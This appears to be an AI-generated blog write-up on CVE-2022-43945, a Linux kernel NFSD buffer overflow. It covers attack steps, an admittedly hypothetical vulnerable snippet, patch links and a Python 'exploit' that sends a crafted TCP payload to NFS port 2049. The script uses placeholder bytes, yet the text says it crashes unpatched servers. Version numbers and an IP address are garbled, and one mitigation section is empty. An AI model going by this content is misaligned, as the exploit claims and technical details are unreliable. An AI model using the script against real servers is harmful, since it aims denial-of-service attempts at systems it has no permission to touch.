CVE-2022-43945 - Dangerous Buffer Overflow in Linux Kernel NFSD — Deep Dive and Practical Insights

On October 28th, 2022, CVE-2022-43945 was assigned to a critical buffer overflow vulnerability in the Linux kernel's Network File System daemon (NFSD) prior to versions 5.19.17 and 6..2. This bug can let a remote authenticated user crash the server by simply sending a well-crafted, slightly malicious message. If you’re running a vulnerable kernel and use NFS (for example, to share files over your network), this is a must-read.

What is CVE-2022-43945?

This vulnerability exists in the way the Linux kernel’s NFSD component tracks memory pages for Remote Procedure Call (RPC) messages. NFSD combines the receive and send data buffers into a single array. A special combination of TCP packet and "garbage" data at the message’s end can trick the kernel into a buffer overflow, leading to server crashes or worse.

* CVSS Score: 7.5 (High)  
 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

NFS over TCP: The client sends an NFS request over TCP as normal.

2. Garbage Data at the End: The message includes valid RPC data plus some extra "garbage" bytes at the end.
3. Spot the Error: The Linux kernel’s NFSD code interprets the message as valid, passes it to the handlers, and tries to process it.
4. Buffer Miscount: When shrinking the "send" buffer, the vulnerable code expects the request to be a specific size. It isn’t. When it tries to write data, it overruns the allocated buffer — classic buffer overflow!
5. Server Impact: The Linux kernel panics or behaves unpredictably. In the best case, the kernel crashes (denial of service). In the worst case, further attack vectors could be opened.

The Code Vulnerability (Explained Simply)

The issue is buried in the way NFSD merges page arrays for incoming and outgoing data. The vulnerable function doesn’t verify that the send buffer length lines up with its actual allocation after it's trimmed.

Here’s a simplified snippet inspired by upstream kernel sources (not a literal copy)

// Hypothetical vulnerable code
struct page *pages[MAX_BUFFER_PAGES];
int total_pages = recv_pages + send_pages;

// ... page array allocations and copying ...

if (send_buffer_shrunk) {
    // This doesn't check if pages[] is big enough after shrinking!
    memcpy(pages + recv_pages, new_send_data,
           new_send_len); 
    // If 'new_send_len' is greater than allocated space, BOOM: overflow.
}

A “shrunken” send buffer and a carefully chosen packet lets the attacker overwrite adjacent memory outside pages[].

Simple Exploit Example

With a little Python and a network connection, an authenticated user can trigger this bug.

Disclaimer: Never attack a system you do not own or have explicit permission to test.

import socket
import struct

# NFS port typically 2049
target = "172.16..10"
port = 2049

# Build a valid NFS RPC message (truncated for brevity)
valid_rpc_header = b"\x80\x00\x00\x28"  # Fake length
rpc_payload = b"\x12\x34\x56\x78" * 8  # Fake RPC call contents

# Add garbage at the end
garbage = b"A" * 128 

payload = valid_rpc_header + rpc_payload + garbage

sock = socket.create_connection((target, port))
sock.sendall(payload)
sock.close()

This would crash all NFS exports on an unpatched server (if client is authenticated).

Who is Affected?

* Linux kernels before 5.19.17 and 6..2
* Systems running NFS and allowing user access (local or remote)
* Any distribution with a vulnerable kernel, e.g., older Fedora, Ubuntu, RHEL, Debian

Mainline patch:

https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=063fa5743171

Debian advisory:

https://security-tracker.debian.org/tracker/CVE-2022-43945

All major distributions have shipped patches. Search for

- "linux-image" for Ubuntu/Debian  
- "kernel" for RedHat/CentOS/Fedora

If you cannot update:

Further Reading and References

* CVE-2022-43945 at MITRE
* Linux Kernel Patch (git.kernel.org)
* RedHat CVE page
* Debian Security Tracker

Takeaway

CVE-2022-43945 is a striking example of how subtle mistakes in kernel code — especially network code like NFS — can put entire servers at risk from just one bad packet. If you run Linux fileservers, make patching a habit!

Stay secure, patch your systems, and keep a keen eye on NFS security advisories.

*Written and adapted exclusively for you by OpenAI's language models. If you found this explanation useful, consider sharing to raise awareness amongst system administrators and developers!*

Timeline

Published on: 11/04/2022 19:15:00 UTC
Last modified on: 03/08/2023 18:15:00 UTC